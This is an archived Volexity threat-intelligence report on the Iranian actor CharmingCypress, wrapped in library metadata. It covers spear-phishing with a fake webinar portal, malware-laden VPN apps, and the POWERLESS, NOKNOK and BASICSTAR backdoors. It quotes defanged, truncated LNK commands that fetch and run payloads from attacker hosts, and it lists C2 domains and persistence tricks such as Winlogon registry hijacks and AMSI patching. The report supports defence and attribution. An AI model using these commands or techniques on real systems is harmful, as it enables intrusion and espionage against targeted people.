{ "id": "71efa982-8f1f-4453-9240-187e5d0c727e", "created_at": "2026-04-06T00:09:07.504099Z", "updated_at": "2026-04-10T03:36:00.85479Z", "deleted_at": null, "sha1_hash": "982bf37657869a231fdb77ab613b2a3807389950", "title": "CharmingCypress: Innovating Persistence", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4006986, "plain_text": "CharmingCypress: Innovating Persistence\r\nBy mindgrub\r\nPublished: 2024-02-13 · Archived: 2026-04-05 18:38:36 UTC\r\nThrough its managed security services offerings, Volexity routinely identifies spear-phishing campaigns targeting\r\nits customers. One persistent threat actor, whose campaigns Volexity frequently observes, is the Iranian-origin\r\nthreat actor CharmingCypress (aka Charming Kitten, APT42, TA453). Volexity assesses that CharmingCypress is\r\ntasked with collecting political intelligence against foreign targets, particularly focusing on think tanks, NGOs,\r\nand journalists.\r\nIn their phishing campaigns, CharmingCypress often employs unusual social-engineering tactics, such as\r\nengaging targets in prolonged conversations over email before sending links to malicious content. In a particularly\r\nnotable spear-phishing campaign observed by Volexity, CharmingCypress went so far as to craft an entirely fake\r\nwebinar platform to use as part of the lure. CharmingCypress controlled access to this platform, requiring targets\r\nto install malware-laden VPN applications prior to granting access.\r\nNote: Some content in this blog was recently discussed in Microsoft’s report, New TTPs observed in Mint\r\nSandstorm campaign targeting high-profile individuals at universities and research orgs.\r\nMalware Families Associated with CharmingCypress\r\nThis blog post serves as a public reference regarding tools Volexity has observed in use by CharmingCypress\r\nthroughout 2023 and into early 2024 including details on techniques the threat actor has used to distribute them.\r\nThe following malware families are discussed in this post:\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 1 of 17\n\nPOWERSTAR\r\nPOWERLESS\r\nNOKNOK\r\nBASICSTAR\r\nEYEGLASS\r\nIn June 2023, Volexity published a post about POWERSTAR. And while CharmingCypress has previously\r\ndistributed POWERSTAR (aka GorjolEcho) and NOKNOK within the same campaign, the use of POWERLESS\r\nin a recently identified campaign is a new observation. Furthermore, BASICSTAR appears to be a new Visual\r\nBasic malware that has limited functional overlap with POWERSTAR.\r\nMalware Distribution Techniques\r\nSpear Phishing\r\nThroughout 2023, Volexity observed a wide range of spear-phishing activity conducted by CharmingCypress. This\r\nactivity included spoofing individuals from different organizations, including the use of personas tied to media\r\norganizations and research institutions. In September and October 2023, CharmingCypress engaged in a series of\r\nspear-phishing attacks in which they masqueraded as the Rasanah International Institute for Iranian Studies (IIIS).\r\nCharmingCypress registered multiple, typo-squatted domains for use in these attacks that are similar to the\r\norganization’s actual domain, rasanah-iiis[.]org.\r\nThe image below shows an example of a spear phish sent by CharmingCypress, in which the threat actor\r\ncontacted a policy expert pretending to be an employee of the Rasanah Institute. The email invites the target to\r\njoin a fake webinar.\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 2 of 17\n\nThis email demonstrates the following features:\r\nAn attempt to engage the target in a conversation, rather than immediately prompting them to open a\r\nmalicious link or download malware\r\nImpersonation of a real organization likely to be known by the target in order to construct a viable reason\r\nfor the contact\r\nThe use of WhatsApp and Signal phone numbers, which are controlled by CharmingCypress and are\r\noffered as alternative methods of contacting the threat actor\r\nOther spear-phish attempts by CharmingCypress in 2023 have involved one or more of the following:\r\nURLs that start a redirection chain, culminating in the download of a RAR archive containing malicious\r\nshortcut (LNK) files\r\nUse of compromised webmail accounts belonging to real contacts of the target\r\nUse of multiple threat-actor controlled email accounts within the same phishing chain (which Proofpoint\r\npreviously described as Multi-Persona Impersonation)\r\nRAR + LNK Combo\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 3 of 17\n\nIn 2023 CharmingCypress often used RAR archives containing LNK files to deliver malware during spear-phishing campaigns. The infection chain from a recent campaign conducted by CharmingCypress is shown below.\r\nAfter initial contact with the target was established and matured, an OnRender URL ( hxxps://cloud-document-edit.onrender[.]com/page/jujbMKB[snipped]TpCNvV ) was shared with the target. This URL redirected to a\r\npassword-protected RAR file hosted on Supabase\r\n( hxxps://wulpfsrqupnuqorhexiw.supabase[.]co/storage/v1/object/public/StarPj/Items%20Shared.rar ). The\r\npassword for this RAR was shared in a subsequent email.\r\nThe RAR file contained two LNK files:\r\nName(s) The global consequences of the Israel-Hamas war – Shortcut.lnk\r\nSize 1.9KB (1945 Bytes)\r\nFile Type LNK\r\nMD5 3fbf3ce1a9b452421970810bd6b6b37a\r\nSHA1 729346dfdd2203a9943119bac03419d63554c4b8\r\nName(s) US strategy in the Middle East is coming into focus – Shortcut.lnk\r\nSize 2.3KB (2371 Bytes)\r\nFile Type LNK\r\nMD5 78e4975dc56e62226f4c56850efb452b\r\nSHA1 1f974d7634103536e524a41a79046785ca7ae3d6\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 4 of 17\n\nThe names of these files were copied from recent articles published by Atlantic Council in order to appeal to the\r\nvictim. Each LNK has its own unique infection workflow. However, both will ultimately open a remotely-hosted\r\ndecoy document and download a malware component. Both LNK files make use of string-replacement to\r\nobfuscate commands.\r\nThe following defanged command, embedded in The global consequences of the Israel-Hamas war -\r\nShortcut.lnk , downloads and executes BASICSTAR, which is discussed in further detail later in this blog post.\r\n/c set c=cu7rl --s7sl-no-rev7oke -s -d \"id=VzXdED\u0026Prog=2_Mal_vbs.txt\u0026WH=The-global-.pdf\" -X PO7ST hxx\r\nThe following defanged command, embedded in US strategy in the Middle East is coming into focus -\r\nShortcut.lnk , downloads and executes KORKULOADER.\r\n/c set fg=powershetsrll.exe -w 1 \"$y=(wgetsrt -Urtsri httsrtps://wulpfsrqupnuqorhexiw.supabase[.]co/s\r\nKORKULOADER is a very simple PowerShell downloader script that could not be used to obtain additional\r\npayloads at the time of investigation.\r\nThis infection chain was partially discussed in this recent Microsoft blog post.\r\nMalware-laden VPN Applications\r\nAnother recent CharmingCypress spear-phishing campaign was developed on a technique reported by Proofpoint\r\nin July 2023 using a malware-laden VPN application to deploy malware. A high-level overview of the overall\r\ninfection chain is shown below.\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 5 of 17\n\nEmails containing a link to a fake webinar platform, and credentials to enable access to it, were distributed to a\r\nsmall number of targeted individuals. The platform was hosted on the following subdomains:\r\nrasaaneh-iiis[.]org\r\nrasaanah-iiis[.]org\r\nVolexity identified emails sent using the following domains, which all mimic the legitimate rasanah-iiis[.]org\r\ndomain:\r\nrasaneh-iiis[.]org\r\nrasaanah-iiis[.]org\r\nrasaaneh-iiis[.]org\r\nWhen users attempted to access the portal, it would check the supplied credentials. If the credentials were correct,\r\nit would then check the IP address used to access the portal. Only users running the attacker’s VPN client would\r\nsuccessfully authenticate. If the IP address check failed, targets were prompted to download a VPN application, as\r\nshown below.\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 6 of 17\n\nDepending on the user’s operating system (determined via the user-agent used to request the page), different\r\napplications would be served to the user. The resulting VPN client was a functional VPN client laden with\r\nmalware. Windows victims would be served an infection chain culminating in POWERLESS, while macOS\r\nvictims would be served an infection chain culminating in NOKNOK.\r\nThe Windows VPN application shown below establishes a connection to a CharmingCypress-controlled VPN\r\nendpoint using the supplied credentials and an OpenVPN configuration file.\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 7 of 17\n\nWhen connected to this VPN, outbound network requests to the portal are routed through the VPN server. The\r\nmacOS version achieves a similar VPN connection using the Apple utility networksetup to install a SOCKS\r\nproxy to the Wi-Fi network service via the following command:\r\nnetworksetup -setsocksfirewallproxy wi-fi $serveradd $portnum\r\nThese proxy parameters are parsed from an OVPN configuration file that contains a legitimate OpenVPN\r\nconfiguration with additional non-standard fields containing data used by the client. The VPN server used was\r\nhosted at 49.13.15[.]66 on UDP port 1194 .\r\nAttempting to log on to the portal while connected to the VPN successfully passes the IP address check and allows\r\naccess to the fake webinar portal.\r\nFake Webinar Portal\r\nInspecting the fake webinar portal shows the threat actor invested a significant level of effort. The portal includes\r\nthe logo of the impersonated organization within a full web portal interface that includes a series of tabs:\r\nWithin the portal, profiles of 16 individuals were populated and associated with a specific webinar. Volexity\r\nreverse engineered the malware-laden VPN application and identified 16 sets of MD5-hashed credentials with\r\nusernames. When these credentials were cracked, they yielded plaintext usernames associated to individuals that\r\nVolexity assesses with high confidence were targets of this campaign. All 16 individuals are experts in policy\r\nregarding the Middle East.\r\nBackdoors\r\nPOWERLESS\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 8 of 17\n\nThe backdoor deployed by the Windows variant of the malware-laden VPN application infection chain is called\r\nPOWERLESS. Previous reporting by Check Point on POWERLESS has linked the tool to EDUCATED\r\nMANTICORE, a group Check Point assesses is “Iranian-aligned” and has “strong overlap with Phosphorous” (aka\r\nCharmingCypress). POWERLESS is a PowerShell backdoor that contains a broad feature set including the\r\nfollowing:\r\nAES-encrypted command-and-control (C2) communication using a key passed down from the server\r\nDownload of additional executables for audio recording, browser information stealing, persistence, and\r\nkeylogging\r\nUpload/download of files\r\nExecution of files\r\nExecution of shell commands\r\nScreenshot capture\r\nTelegram information theft\r\nUpdate configuration of POWERLESS in memory, including modification of C2 address\r\nThese functions are largely the same as previously described by Check Point; however, the infection chain is\r\nslightly different. The malware-laden VPN application writes a malicious binary, VPN.exe (file details below), to\r\nthe default OpenVPN directory and executes it. VPN.exe handles authentication via the supplied credentials and\r\nconnection to the VPN.\r\nName(s) VPN.exe\r\nSize 1.2MB (‍1250816 Bytes)\r\nFile Type application/x-dosexec\r\nMD5 266305f34477b679e171375e12e6880f\r\nSHA1 607137996a8dc4d449185586ecfbe886e120e6b1\r\nIt also downloads a base64-encoded blob of data from the C2, writes this to disk at C:\\Users\\Public\\vconf , and\r\ndownloads a .NET binary named cfmon.exe (file details below). Persistence for cfmon.exe is achieved by adding\r\na Shell registry entry in registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Winlogon (see T1547.004 for more information on this technique).\r\nName(s) cfmon.exe\r\nSize 119.0KB (121856 Bytes)\r\nFile Type application/x-dosexec\r\nMD5 859a9e523c3308c120e82068829fab84\r\nSHA1 5bdec05bdca8176ae67054a3a7dc8c5ef0ac8deb\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 9 of 17\n\nWhen executed, cfmon.exe first patches the AmsiScanBuffer and EtwEventWrite API functions to bypass\r\nthem, replacing the initial function bytes. It then decrypts the AES-encrypted file vconf, retrieved by the previous\r\nbinary, yielding an obfuscated PowerShell script. This PowerShell script is executed in memory. After\r\ndeobfuscating this script, Volexity identified it as a new version of the POWERLESS malware. Details of the\r\nanalyzed POWERLESS sample are below.\r\nName(s) N/A\r\nSize 235.0KB (240620 Bytes)\r\nFile Type text/plain\r\nMD5 c3fe93fc9133c0bc4b441798b9bcf151\r\nSHA1 87f36a0279b31a4a2f9b1123674e3dea130f1554\r\nThe C2 address used by this sample of POWERLESS is defaultbluemarker[.]info . The following domains\r\ncould be trivially linked to this domain via shared SSL certificates and/or hosting infrastructure:\r\nyellowparallelworld.ddns[.]net\r\nbeginningofgraylife.ddns[.]net\r\nVolexity was able to obtain the three additional modules used by POWERLESS, which are further described\r\nbelow.\r\nBrowser Information Stealer\r\nA browser information stealer module named blacksmith.exe can steal passwords, cookies and browser history.\r\nName(s) blacksmith.exe\r\nSize 1.6MB (‍1651200 Bytes)\r\nFile Type application/x-dosexec\r\nMD5 9b6c308f106e72394a89fac083de9934\r\nSHA1 27b38cf6667936c74ed758434196d2ac9d14deae\r\nPersistence\r\nA persistence module downloads an executable, oqeifvb.exe , from the C2, writes this to\r\n$env:windir\\Temp\\p\\ , and executes this via the Start-Process cmdlet. This module also passes the CLSID value\r\nof the legitimate scheduled task MsCtfMonitor to oqeifvb.exe . POWERLESS then maintains persistence by\r\nadding the HKCU\\Environment\\UserInitMprLogonScript registry entry with a value of oqeifvb.exe .\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 10 of 17\n\nThe purpose of oqeifvb.exe is to download another file, msedg.dll , and establish persistence for that file by\r\nhijacking the COM handler for the MsCtfMonitor scheduled task using the CLSID retrieved earlier. Volexity was\r\nnot able to obtain the additional DLL and therefore assesses CharmingCypress likely limits deployment of this\r\nadditional stage to victims who have been manually approved to receive it.\r\nName(s) oqeifvb.exe\r\nSize 448.5KB (459264 Bytes)\r\nFile Type application/x-dosexec\r\nMD5 c79d85d0b9175cb86ce032543fe6b0d5\r\nSHA1 195e939e0ae70453c0817ebca8049e51bbd4a825\r\nAudio Recorder\r\nAn audio recorder module named AudioRecorder4.exe simply captures audio using the Windows API.\r\nName(s) AudioRecorder4.exe\r\nSize 344.5KB (352768 Bytes)\r\nFile Type application/x-dosexec\r\nMD5 5fc8668f9c516c2b08f34675380e2a57\r\nSHA1 c3fd8ed68c0ad2a97d76fc4430447581414e7a7e\r\nNOKNOK\r\nThe backdoor deployed by the macOS version of the malware-laden VPN application infection chain is called\r\nNOKNOK. This is downloaded by the VPN application and executed in memory. The download mechanism is\r\nidentical to that described by Proofpoint in their recent report. For example, the download URL for this bash script\r\nshares the same /DMPR/[alphanumeric string] format.\r\nCharmingCypress delivers NOKNOK as a string that has been base64 encoded five times. The resulting script is\r\nthe same as the previous version of the NOKNOK malware described by Proofpoint. The C2 used by this sample\r\nof NOKNOK is decorous-super-blender[.]glitch[.]me .\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 11 of 17\n\nBASICSTAR\r\nThe backdoor deployed by the RAR + LNK infection chain is a previously undocumented backdoor that Volexity\r\ntrack as BASICSTAR. Details of the analyzed sample are below.\r\nName(s) down.vbs\r\nSize 13.3KB (13652 Bytes)\r\nFile Type application/octet-stream\r\nMD5 2edea0927601ef443fc31f9e9f8e7a77\r\nSHA1 cdce8a3e723c376fc87be4d769d37092e6591972\r\nBASICSTAR has the following functionality:\r\nCollect the computer name, username and operating system from compromised device. This information is\r\nreversed and base64 encoded before being passed to the C2 server.\r\nDownload a lure PDF from the C2 and open it.\r\nDownload the NirCmd command-line interface for execution of subsequent commands.\r\nEnter a command loop, passing the collected information to the C2 and inspecting the returned result for a\r\ncommand.\r\nExecute commands via the NirCmd command-line interface.\r\nRemotely execute commands relayed from the C2 (see table below).\r\nCommand Function\r\nkill Delete update.vbs , a.vbs , and a.ps1 , and then exit.\r\nSetNewConfig Set a new sleep timer for the command loop.\r\nModule\r\nUse ModuleTitle , ModuleName and Parameters to download a file, and execute this\r\nvia NirCmd.\r\nVolexity was not able to obtain the additional modules used by BASICSTAR. Interestingly, the cleanup command\r\n( kill ) deletes three files that were not observed by Volexity ( update.vbs , a.vbs , and a.ps1 ). These are\r\nlikely Visual Basic and PowerShell scripts downloaded in subsequent components of the attack. This capability is\r\nin line with the same command in the POWERSTAR malware family.\r\nInformations.vbs\r\nThe latest version of BASICSTAR observed by Volexity involved a Visual Basic script named\r\nInformations.vbs (see below).\r\nName(s) Informations.vbs\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 12 of 17\n\nSize 21.6KB (22134 Bytes)\r\nFile Type unknown\r\nMD5 853687659483d215309941dae391a68f\r\nSHA1 25005352eff725afc93214cac14f0aa8e58ca409\r\nVolexity assesses with high confidence that this script is a BASICSTAR module with an internal name of\r\nInformations (sic). This module uses a variety of WMI queries to gather an extensive set of information about\r\nthe compromised machine, including the following:\r\nInstalled antivirus products\r\nInstalled software\r\nInformation regarding the machine BIOS, hardware, manufacturer details, and disks\r\nNetwork adapters and configurations\r\nThe BASICSTAR sample involved in this infection chain was configured to use the Glitch domain prism-west-candy[.]glitch[.]me as a C2.\r\nPost-exploitation Activity \u0026 Investigation with Volexity Volcano\r\nIn one incident response case, Volexity gained some rare insight into additional tools CharmingCypress deploys if\r\nthey successfully compromise a device. Volexity used Volexity Volcano to analyze memory from the compromised\r\nendpoint. Despite being protected by a popular endpoint detection and response (EDR) solution, Volcano quickly\r\nshowed several obvious signs of compromise.\r\nOne of Volcano’s automated IOCs (“Bad Powershell”) triggered on a script extracted from event logs. The log\r\ncontains references to some of the remote systems contacted by the script, including supabase[.]co .\r\nFurthermore, it identifies the PID of the powershell.exe process ( 13524 ) that executed this script, as shown\r\nbelow.\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 13 of 17\n\nThis powershell.exe instance was still running, with its parent tree intact. Components of the LNK payload that\r\ndownloads BASICSTAR stood out in the command-line arguments, as shown below.\r\nThe process tree shows the interesting effect of string substitution. Both conhost.exe and cmd.exe contain\r\nobfuscated content, but the decoded arguments to powershell.exe were preserved in memory:\r\npowershell -w 1 $pnt=(Get-Content\" -Path C:\\Users\\\u003credacted\u003e\\AppData\\Roaming\\Microsoft\\documentLoge\r\nArmed with knowledge of the documentLoger.txt path, Volexity reconstructed the entire contents from the\r\nsystem’s file cache, as shown below.\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 14 of 17\n\nAnother Volcano IOC (“Shortcut Execution”) brought attention to one of the LNK files, Draft-LSE.pdf.lnk ,\r\nused in this attack. As shown below, this uses the icon from Microsoft Edge to trick end users.\r\nSearching memory for the source of the LNK revealed an archive file named Draft-LSE (3).rar in the user’s\r\nDownloads folder, along with a valuable set of timestamps to triage the activity, although the (3) in the file\r\nname suggests this was not the first time the user downloaded this file. In the MFT-resident $DATA attribute, the\r\nZoneTransfer record showed where the file originated, as shown below.\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 15 of 17\n\nAfter just a few minutes of reviewing Volcano’s IOC hits and searching for related artifacts in both memory and\r\nfiles collected by Volexity Surge Collect Pro, Volexity analysts had nailed down the following evidence:\r\nThe initial infection vector and the website from where it was downloaded\r\nHow it persisted on the endpoint\r\nThe list of C2 hostnames\r\nTimestamps when the activity took place\r\nMany other IOCs to triage\r\nWorking folders used by the attacker on the compromised machine\r\nAdditional Tools Used by CharmingCypress\r\nIn the same investigation, Volexity identified additional tools used by CharmingCypress to facilitate data theft:\r\nNirsoft Chrome History Viewer\r\nRATHOLE\r\nSNAILPROXY\r\nCommandCam\r\nCommand-line copies of WinRAR and 7-Zip\r\nVolexity also identified a copy of EYEGLASS, the malware documented in a recent Microsoft post under the\r\nMediaPl backdoor section. In the case investigated by Volexity, EYEGLASS had been set up as the default\r\nhandler for the TIF file extension. Encountering TIF files as part of the targeted user’s day-to-day work would be\r\nunusual, and it is unlikely the attacker would want to randomly display a TIF on an already-infected device. Based\r\non available evidence, Volexity assesses with high confidence that EYEGLASS was intended only as a backup C2\r\nmechanism. In this scenario, if CharmingCypress lost access to the victim machine, they would try sending the\r\nuser a specially crafted TIF file in order to regain access to the device if the user opened the file.\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 16 of 17\n\nConclusion\r\nThis blog post describes targeted campaigns that reveal a high level of effort CharmingCypress is willing to\r\ndedicate to support their spear-phishing operations. This threat actor is highly committed to conducting\r\nsurveillance on their targets in order to determine how best to manipulate them and deploy malware. Additionally,\r\nfew other threat actors have consistently churned out as many campaigns as CharmingCypress, dedicating human\r\noperators to support their ongoing efforts.\r\nFor those targeted by CharmingCypress, such as journalists, activists, academics, and policy experts, it is crucial\r\nto understand that CharmingCypress is persistent. This threat actor is willing to modify their techniques on a\r\nregular basis in order to maximize their chances of compromising specific targets.\r\nFor threat intelligence readers, this blog post firmly links NOKNOK and POWERLESS to recent\r\nCharmingCypress spear-phishing activity and adds documentation regarding the BASICSTAR backdoor. This\r\ncluster has previously used the POWERSTAR malware family during similar operations.\r\nRelated indicators to detect and investigate these attacks can also be downloaded from the Volexity GitHub page:\r\nYARA rules\r\nSingle value indicators\r\nVolexity’s Threat Intelligence research, such as the content from this blog, is published to customers via\r\nits Threat Intelligence Service. The activity described in this blog post was shared with Volexity Threat\r\nIntelligence customers throughout 2023 and in January 2024.\r\nIf you are interested in learning more about Volexity’s services or leading memory forensics\r\nsolutions, Volexity Surge Collect Pro for memory acquisition and Volexity Volcano for memory\r\nanalysis, please do not hesitate to contact us.\r\nSource: https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nhttps://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MISPGALAXY", "Malpedia" ], "references": [ "https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/" ], "report_names": [ "charmingcypress-innovating-persistence" ], "threat_actors": [ { "id": "82b92285-4588-48c9-8578-bb39f903cf62", "created_at": "2022-10-25T15:50:23.850506Z", "updated_at": "2026-04-10T02:00:05.418577Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "Charming Kitten" ], "source_name": "MITRE:Charming Kitten", "tools": [ "DownPaper" ], "source_id": "MITRE", "reports": null }, { "id": "d8af157e-741b-4933-bb4a-b78490951d97", "created_at": "2023-01-06T13:46:38.748929Z", "updated_at": "2026-04-10T02:00:03.087356Z", "deleted_at": null, "main_name": "APT35", "aliases": [ "COBALT MIRAGE", "Agent Serpens", "Newscaster Team", "Magic Hound", "G0059", "Phosphorus", "Mint Sandstorm", "TunnelVision" ], "source_name": "MISPGALAXY:APT35", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d0e8337e-16a7-48f2-90cf-8fd09a7198d1", "created_at": "2023-03-04T02:01:54.091301Z", "updated_at": "2026-04-10T02:00:03.356317Z", "deleted_at": null, "main_name": "APT42", "aliases": [ "UNC788", "CALANQUE" ], "source_name": "MISPGALAXY:APT42", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ae26d287-8ba7-447e-9391-cf13c02d7481", "created_at": "2023-03-04T02:01:54.0962Z", "updated_at": "2026-04-10T02:00:03.357189Z", "deleted_at": null, "main_name": "TA453", "aliases": [], "source_name": "MISPGALAXY:TA453", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "029625d2-9734-44f9-9e10-b894b4f57f08", "created_at": "2023-01-06T13:46:38.364105Z", "updated_at": "2026-04-10T02:00:02.944092Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "iKittens", "Group 83", "NewsBeef", "G0058", "CharmingCypress", "Mint Sandstorm", "Parastoo" ], "source_name": "MISPGALAXY:Charming Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4", "created_at": "2022-10-25T15:50:23.808974Z", "updated_at": "2026-04-10T02:00:05.291959Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "Magic Hound", "TA453", "COBALT ILLUSION", "Charming Kitten", "ITG18", "Phosphorus", "APT35", "Mint Sandstorm" ], "source_name": "MITRE:Magic Hound", "tools": [ "Impacket", "CharmPower", "FRP", "Mimikatz", "Systeminfo", "ipconfig", "netsh", "PowerLess", "Pupy", "DownPaper", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03", "created_at": "2025-08-07T02:03:24.746965Z", "updated_at": "2026-04-10T02:00:03.640335Z", "deleted_at": null, "main_name": "COBALT ILLUSION", "aliases": [ "APT35 ", "APT42 ", "Agent Serpens Palo Alto", "Charming Kitten ", "CharmingCypress ", "Educated Manticore Checkpoint", "ITG18 ", "Magic Hound ", "Mint Sandstorm sub-group ", "NewsBeef ", "Newscaster ", "PHOSPHORUS sub-group ", "TA453 ", "UNC788 ", "Yellow Garuda " ], "source_name": "Secureworks:COBALT ILLUSION", "tools": [ "Browser Exploitation Framework (BeEF)", "MagicHound Toolset", "PupyRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "0b212c43-009a-4205-a1f7-545c5e4cfdf8", "created_at": "2025-04-23T02:00:55.275208Z", "updated_at": "2026-04-10T02:00:05.270553Z", "deleted_at": null, "main_name": "APT42", "aliases": [ "APT42" ], "source_name": "MITRE:APT42", "tools": [ "NICECURL", "TAMECAT" ], "source_id": "MITRE", "reports": null }, { "id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f", "created_at": "2022-10-25T16:07:23.83826Z", "updated_at": "2026-04-10T02:00:04.761303Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "APT 35", "Agent Serpens", "Ballistic Bobcat", "Charming Kitten", "CharmingCypress", "Cobalt Illusion", "Cobalt Mirage", "Educated Manticore", "G0058", "G0059", "Magic Hound", "Mint Sandstorm", "Operation BadBlood", "Operation Sponsoring Access", "Operation SpoofedScholars", "Operation Thamar Reservoir", "Phosphorus", "TA453", "TEMP.Beanie", "Tarh Andishan", "Timberworm", "TunnelVision", "UNC788", "Yellow Garuda" ], "source_name": "ETDA:Magic Hound", "tools": [ "7-Zip", "AnvilEcho", "BASICSTAR", "CORRUPT KITTEN", "CWoolger", "CharmPower", "ChromeHistoryView", "CommandCam", "DistTrack", "DownPaper", "FRP", "Fast Reverse Proxy", "FireMalv", "Ghambar", "GoProxy", "GorjolEcho", "HYPERSCRAPE", "Havij", "MPK", "MPKBot", "Matryoshka", "Matryoshka RAT", "MediaPl", "Mimikatz", "MischiefTut", "NETWoolger", "NOKNOK", "PINEFLOWER", "POWERSTAR", "PowerLess Backdoor", "PsList", "Pupy", "PupyRAT", "SNAILPROXY", "Shamoon", "TDTESS", "WinRAR", "WoolenLogger", "Woolger", "pupy", "sqlmap" ], "source_id": "ETDA", "reports": null }, { "id": "1efe328c-7bda-49d8-82bf-852d220110ae", "created_at": "2026-01-22T02:00:03.661882Z", "updated_at": "2026-04-10T02:00:03.917703Z", "deleted_at": null, "main_name": "Educated Manticore", "aliases": [], "source_name": "MISPGALAXY:Educated Manticore", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434147, "ts_updated_at": 1775792160, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/982bf37657869a231fdb77ab613b2a3807389950.pdf", "text": "https://archive.orkl.eu/982bf37657869a231fdb77ab613b2a3807389950.txt", "img": "https://archive.orkl.eu/982bf37657869a231fdb77ab613b2a3807389950.jpg" } }